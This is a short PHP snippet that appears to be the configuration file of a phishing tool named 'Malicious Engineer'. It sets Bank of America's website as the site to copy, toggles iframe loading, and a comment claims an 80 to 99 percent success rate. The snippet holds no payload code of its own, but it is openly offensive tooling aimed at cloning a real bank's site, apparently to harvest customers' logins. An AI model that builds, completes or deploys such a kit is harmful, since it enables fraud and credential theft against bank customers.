<?php 
$site = "https://bankofamerica.com"; # give it a site to copy
$iframe = false;

# use iframe only if the site doesn't load or if css is messed up.
# Malicious Engineer has a 80 - 99% success rate